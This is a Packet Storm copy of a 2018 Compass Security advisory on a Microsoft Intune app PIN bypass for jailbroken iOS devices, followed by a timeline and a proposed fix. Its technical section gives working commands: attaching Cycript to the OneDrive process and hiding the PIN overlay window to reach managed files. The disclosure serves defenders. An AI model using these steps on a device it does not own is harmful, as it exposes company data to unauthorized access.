what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Intune App PIN Bypass

Microsoft Intune App PIN Bypass
Posted Feb 13, 2018
Authored by Stephan Sekula

Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN.

tags | exploit
systems | cisco, ios
SHA-256 | 9eb901ef1974be004d63aa35bd969efac3bd77a0a761e1cbabb90340bf37e26c

Microsoft Intune App PIN Bypass

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Microsoft Intune [1]
# Vendor: Microsoft
# CSNC ID: CSNC-2017-027
# Subject: App PIN Bypass
# Risk: Medium
# Effect: Locally exploitable
# Author: Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 31.08.2017
#
#############################################################

Introduction:
-------------
Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1]

Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN.


Technical Description
---------------------
Microsoft Intune supports protection policies such as requiring a PIN to access a managed app. In the current implementation however, the app PIN is used to show and hide an overlay screen, restricting access to the files using the UI only.

Therefore, if the device is jailbroken, a simple Cycript script can be written to hide the overlay and use the UI to access all stored files.

To bypass the PIN, one needs to find the app's process ID (PID):
# ps aux | grep OneDrive
mobile 2086 1.2 4.9 1287904 100480 ?? Ss 11:06AM 0:05.59 /var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive

Attach to the app's process using Cycript and list the current view's details:
# cycript -p 2086
cy# UIApp.keyWindow.recursiveDescription().toString()
<CMARAppRestrictionsWindow: 0x105088e00; baseClass = UIWindow; frame = (0 0; 768 1024); gestureRecognizers = <NSArray: 0x17045b630>; layer = <UIWindowLayer: 0x170228180>>
| <UITransitionView: 0x1050aab80; frame = (0 0; 768 1024); autoresize = W+H; layer = <CALayer: 0x1702301a0>>
| | [CUT BY COMPASS]
| | | | <UIButtonLabel: 0x1050ad1a0; frame = (299.5 6.5; 170.5 27.5); text = 'Forgot your PIN?'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x170295950>>

Now, the overlay window can be hidden:
cy# [#0x105088e00 setHidden: YES]

The above command will lead to the PIN request window to be hidden, hence, granting access to the files using the mobile app UI.


Workaround / Fix:
-----------------
The PIN protection mechanism should be revisited. One solution would be, to encrypt all documents using a key derived from the user's PIN, hence rendering a simple Cycript bypass code useless.

Furthermore, the app should verify whether the user's device is jailbroken, and if a jailbreak is detected, all managed apps and their data should be wiped from the device.


Timeline:
---------
2017-08-22: Discovery by Stephan Sekula
2017-09-17: Initial vendor notification
2017-09-18: Initial vendor response
2017-10-04: Asking vendor for an update
2017-10-04: Vendor replies that engineers are working on reproducing the issue
2017-11-01 Asking vendor for an update
2017-11-02 Vendor replies that the root cause is a vulnerability in iOS.
Case is marked as won't fix.
2018-02-13 Public disclosure


References:
-----------
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close